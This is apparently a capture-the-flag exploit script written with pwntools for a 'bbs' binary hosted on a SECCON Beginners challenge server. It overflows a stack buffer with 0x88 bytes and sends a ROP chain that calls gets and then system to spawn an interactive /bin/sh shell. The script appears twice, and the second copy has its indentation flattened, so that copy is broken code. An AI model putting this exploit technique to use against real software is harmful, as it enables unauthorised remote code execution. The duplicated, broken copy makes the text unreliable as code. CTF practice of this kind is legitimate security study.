hama7230/exploit.py

## exploit.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7')
context(os='linux', arch=elf.arch)
context(log_level='debug')  # output verbose log

RHOST = "pwn1.chall.beginners.seccon.jp"
RPORT = 18373
LHOST = "127.0.0.1"
LPORT = 18373

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """
    set follow-fork-mode parent
    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], gdbscript=gdbscript)
else:
    conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'])
    # conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')
# 0x0000000000400763 : pop rdi ; ret
pop_rdi = 0x0000000000400763
rw = 0x601300
system_plt = elf.symbols['system']
gets_plt = elf.symbols['gets']

rop = p64(pop_rdi) + p64(rw) + p64(gets_plt)
rop += p64(pop_rdi) + p64(rw) + p64(system_plt)
conn.sendline('a'*0x88 + rop)
conn.sendline('/bin/sh\x00')

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7')
	context(os='linux', arch=elf.arch)
	context(log_level='debug') # output verbose log

	RHOST = "pwn1.chall.beginners.seccon.jp"
	RPORT = 18373
	LHOST = "127.0.0.1"
	LPORT = 18373

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """
	set follow-fork-mode parent
	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], gdbscript=gdbscript)
	else:
	conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'])
	# conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')
	# 0x0000000000400763 : pop rdi ; ret
	pop_rdi = 0x0000000000400763
	rw = 0x601300
	system_plt = elf.symbols['system']
	gets_plt = elf.symbols['gets']

	rop = p64(pop_rdi) + p64(rw) + p64(gets_plt)
	rop += p64(pop_rdi) + p64(rw) + p64(system_plt)
	conn.sendline('a'*0x88 + rop)
	conn.sendline('/bin/sh\x00')

	conn.interactive()